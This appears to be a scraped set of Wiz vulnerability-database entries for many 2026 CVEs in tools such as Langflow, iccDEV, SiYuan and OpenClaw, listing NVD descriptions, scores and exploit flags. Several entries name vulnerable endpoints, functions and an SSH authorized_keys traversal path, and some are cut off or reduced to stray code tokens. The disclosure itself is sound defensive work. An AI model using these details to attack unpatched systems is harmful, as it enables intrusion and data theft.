CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-33017 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33017 [CRITICAL] CVE-2026-33017 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33017 :
Homebrew vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly acc
Wiz
CVE-2026-25585 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-25585 [HIGH] CVE-2026-25585 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25585 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.3, there is a vulnerability IccCmm.cpp:5793 when reading through index during ICC profile processing. The malformed ICC profile triggers improper array bounds validation in the color management module, resulting in an out-of-bounds read that can lead to memory disclosure or segmentation fault from accessing memory beyond the array boundary. This issue has been patched in version 2.3.1.3.
Source : NVD
## 7.8
Score
Published February 4, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA
Wiz
CVE-2026-32626 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-32626 [CRITICAL] CVE-2026-32626 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32626 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, AnythingLLM Desktop contains a Streaming Phase XSS vulnerability in the chat rendering pipeline that escalates to Remote Code Execution on the host OS due to insecure Electron configuration. This works with default settings and requires no user interaction beyond normal chat usage. The custom markdown-it image renderer in frontend/src/utils/chat/markdown.js interpolates token.content directly into the alt attribute without HTML entity escaping. The PromptReply component renders this output via dangerouslySetInnerHTML without DOMPurify sanitization — unlike HistoricalMessage whi
Wiz
CVE-2026-3382 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3382 [MEDIUM] CVE-2026-3382 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3382 :
Homebrew vulnerability analysis and mitigation
A security flaw has been discovered in ChaiScript up to 6.1.0. The impacted element is the function chaiscript::Boxed_Number::get_as of the file include/chaiscript/dispatchkit/boxed_number.hpp. Performing a manipulation results in memory corruption. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Explo
Wiz
CVE-2026-21507 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-21507 [HIGH] CVE-2026-21507 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21507 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have an infinite loop in the IccProfile.cpp function, CalcProfileID. This issue is fixed in version 2.3.1.1.
Source : NVD
## 7.5
Score
Published January 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can
Wiz
CVE-2026-2661 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2661 [MEDIUM] CVE-2026-2661 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2661 :
Homebrew vulnerability analysis and mitigation
A security flaw has been discovered in Squirrel up to 3.2. This affects the function SQObjectPtr::operator in the library squirrel/sqobject.h. The manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.9
Exploitation Probability (EPSS) N
Wiz
CVE-2026-34530 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-34530 [MEDIUM] CVE-2026-34530 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34530 :
Wolfi vulnerability analysis and mitigation
File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the SPA index page in File Browser is vulnerable to Stored Cross-Site Scripting (XSS) via admin-controlled branding fields. An admin who sets branding.name to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. This issue has been patched in version 2.62.2.
Source : NVD
## 6.9
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Wolfi
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabil
Wiz
CVE-2026-32810 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-32810 [MEDIUM] CVE-2026-32810 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32810 :
Homebrew vulnerability analysis and mitigation
0644
0755
config.toml
password_file
Source : NVD
## 4.8
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
halloy
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published
Wiz
CVE-2026-27487 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-27487 [HIGH] CVE-2026-27487 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27487 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. In versions 2026.2.13 and below, when using macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via security add-generic-password -w .... Because OAuth tokens are user-controlled data, this created an OS command injection risk. This issue has been fixed in version 2026.2.14.
Source : NVD
## 8
Score
Published February 21, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.9
Exploitation Probability (EPSS)
Wiz
CVE-2026-28217 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-28217 [MEDIUM] CVE-2026-28217 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28217 :
Homebrew vulnerability analysis and mitigation
userCollection
data
Source : NVD
## 6.5
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
hoppscotch
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-20
Wiz
CVE-2026-32751 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-32751 [MEDIUM] CVE-2026-32751 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32751 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the mobile file tree (MobileFiles.ts) renders notebook names via innerHTML without HTML escaping when processing renamenotebook WebSocket events. The desktop version (Files.ts) properly uses escapeHtml() for the same operation. An authenticated user who can rename notebooks can inject arbitrary HTML/JavaScript that executes on any mobile client viewing the file tree. Since Electron is configured with nodeIntegration: true and contextIsolation: false, the injected JavaScript has full Node.js access, escalating stored XSS to full remote code execution. The mobile layout is also used in the Electron desktop app when the window is narrow, making th
Wiz
CVE-2026-25647 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-25647 [MEDIUM] CVE-2026-25647 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25647 :
Homebrew vulnerability analysis and mitigation
Lute is a structured Markdown engine supporting Go and JavaScript. Lute 1.7.6 and earlier (as used in SiYuan before) has a Stored Cross-Site Scripting (XSS) vulnerability in the Markdown rendering engine. An attacker can inject malicious JavaScript into a Markdown text/note. When another user clicks the rendered content, the script executes in the context of their session.
Source : NVD
## 5.4
Score
Published February 6, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
siyuan
Sourc
Wiz
CVE-2026-21682 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21682 [HIGH] CVE-2026-21682 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21682 :
Homebrew vulnerability analysis and mitigation
CIccXmlArrayType::ParseText()
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-
Wiz
CVE-2026-29183 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-29183 [CRITICAL] CVE-2026-29183 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29183 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.5.9, an unauthenticated reflected XSS vulnerability exists in the dynamic icon API endpoint "GET /api/icon/getDynamicIcon" when type=8, attacker-controlled content is embedded into SVG output without escaping. Because the endpoint is unauthenticated and returns image/svg+xml, a crafted URL can inject executable SVG/HTML event handlers (for example onerror) and run JavaScript in the SiYuan web origin. This can be chained to perform authenticated API actions and exfiltrate sensitive data when a logged-in user opens the malicious link. This issue has been patched in version 3.5.9.
Source : NVD
## 6.1
Score
Published March 6, 2026
Severity MEDIUM
CNA
Wiz
CVE-2026-23999 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 0.6
CVE-2026-23999 [LOW] CVE-2026-23999 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23999 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. In versions prior to 4.80.1, Fleet generated device lock and wipe PINs using a predictable algorithm based solely on the current Unix timestamp. Because no secret key or additional entropy was used, the resulting PIN could potentially be derived if the approximate time the device was locked is known. Fleet’s device lock and wipe commands generate a 6-digit PIN that is displayed to administrators for unlocking a device. In affected versions, this PIN was deterministically derived from the current timestamp. An attacker with physical possession of a locked device and knowledge of the approximate time the lock command was issued could theoretically predict the correct PIN with
Wiz
CVE-2026-21485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21485 [HIGH] CVE-2026-21485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21485 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are prone to have Undefined Behavior (UB) and Out of Memory errors. This issue is fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you ca
Wiz
CVE-2026-32733 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32733 [HIGH] CVE-2026-32733 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32733 :
Homebrew vulnerability analysis and mitigation
DCC SEND
../../.ssh/authorized_keys
save_directory
sanitize_filename
Source : NVD
## 8.7
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
halloy
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
Wiz
CVE-2026-22869 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22869 [HIGH] CVE-2026-22869 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22869 :
Homebrew vulnerability analysis and mitigation
Eigent is a multi-agent Workforce. A critical security vulnerability in the CI workflow (.github/workflows/ci.yml) allows arbitrary code execution from fork pull requests with repository write permissions. The vulnerable workflow uses pull_request_target trigger combined with checkout of untrusted PR code. An attacker can exploit this to steal credentials, post comments, push code, or create releases.
Source : NVD
## 8.9
Score
Published January 13, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.7
Exploitation Probability (EPSS) 0.2
Affected packages
Wiz
CVE-2026-21488 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21488 [MEDIUM] CVE-2026-21488 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21488 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are vulnerable to Out-of-bounds Read, Heap-based Buffer Overflow and Improper Null Termination through its CIccTagText::Read function. This issue is fixed in version 2.3.1.2.
Source : NVD
## 7.1
Score
Published January 6, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE risk as
Wiz
CVE-2026-3389 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3389 [MEDIUM] CVE-2026-3389 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3389 :
Homebrew vulnerability analysis and mitigation
A vulnerability was determined in Squirrel up to 3.2. This vulnerability affects the function sqstd_rex_newnode in the library sqstdlib/sqstdrex.cpp. Executing a manipulation can lead to null pointer dereference. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-25474 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-25474 [HIGH] CVE-2026-25474 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25474 :
Homebrew vulnerability analysis and mitigation
channels.telegram.webhookUrl
Source : NVD
## 7.5
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
S
Wiz
CVE-2025-40896 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-40896 [MEDIUM] CVE-2025-40896 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40896 :
Homebrew vulnerability analysis and mitigation
The server certificate was not verified when an Arc agent connected to a Guardian or CMC.
A malicious actor could perform a man-in-the-middle attack and intercept the communication between the Arc agent and the Guardian or CMC. This could result in theft of the client token and sensitive information (such as assets and alerts), impersonation of the server, or injection of spoofed data (such as false asset information or vulnerabilities) into the Guardian or CMC.
Source : NVD
## 6.3
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-30981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-30981 [MEDIUM] CVE-2026-30981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30981 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-buffer-overflow read in CIccXmlArrayType<>::DumpArray() causing out-of-bounds read and/or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 6.1
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized
Wiz
CVE-2026-24406 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-24406 [HIGH] CVE-2026-24406 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24406 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-33497 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-33497 [HIGH] CVE-2026-33497 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33497 :
Homebrew vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch.
Source : NVD
## 8.7
Score
Published March 24, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Homebrew
LangFlow
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
langflow
Sources
Wiz
CVE-2026-32110 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-32110 [HIGH] CVE-2026-32110 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32110 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.
Source : NVD
## 8.3
Score
Published March 11, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.7
Exploitation Pr
Wiz
CVE-2025-70037 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-70037 [MEDIUM] CVE-2025-70037 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70037 :
Homebrew vulnerability analysis and mitigation
An issue pertaining to CWE-601: URL Redirection to Untrusted Site was discovered in linagora Twake v2023.Q1.1223. This allows attackers to obtain sensitive information and execute arbitrary code.
Source : NVD
## 6.1
Score
Published March 9, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
twake
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, no
Wiz
CVE-2026-21498 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21498 [MEDIUM] CVE-2026-21498 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21498 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML calculator parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 2026
## Get a CVE risk
Wiz
CVE-2026-29078 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-29078 [HIGH] CVE-2026-29078 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29078 :
Homebrew vulnerability analysis and mitigation
Lexbor is a web browser engine library. Prior to 2.7.0, the ISO‑2022‑JP encoder in Lexbor fails to reset the temporary size variable between iterations. The statement ctx->buffer_used -= size with a stale size = 3 causes an integer underflow that wraps to SIZE_MAX. Afterwards, memcpy is called with a negative length, leading to an out‑of‑bounds read from the stack and an out‑of‑bounds write to the heap. The source data is partially controllable via the contents of the DOM tree. This vulnerability is fixed in 2.7.0.
Source : NVD
## 8.2
Score
Published March 13, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-26186 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-26186 [MEDIUM] CVE-2026-26186 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26186 :
Homebrew vulnerability analysis and mitigation
order_key
goqu.I()
ORDER BY
ORDER BY
Source : NVD
## 5.1
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/fleetdm/fleet
fleet
Sources
NVD
GoLang Severity MEDIUM Has Fix Added at: Mar 02, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
S
Wiz
CVE-2026-27627 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-27627 [HIGH] CVE-2026-27627 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27627 :
Homebrew vulnerability analysis and mitigation
readableContentHtml
dangerouslySetInnerHTML
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 8.2
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
karakeep
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-26329 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-26329 [HIGH] CVE-2026-26329 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26329 :
Homebrew vulnerability analysis and mitigation
upload
setInputFiles()
browser
DEFAULT_UPLOAD_DIR
Source : NVD
## 7.1
Score
Published February 20, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vul
Wiz
CVE-2026-2656 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-2656 [LOW] CVE-2026-2656 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2656 :
Homebrew vulnerability analysis and mitigation
A flaw has been found in ChaiScript up to 6.1.0. This affects the function chaiscript::Type_Info::bare_equal of the file include/chaiscript/dispatchkit/type_info.hpp. This manipulation causes use after free. The attack requires local access. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 2
Score
Published February 18, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (E
Wiz
CVE-2026-33945 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-33945 [CRITICAL] CVE-2026-33945 Impact, Exploitability, and Mitigation Steps | Wiz
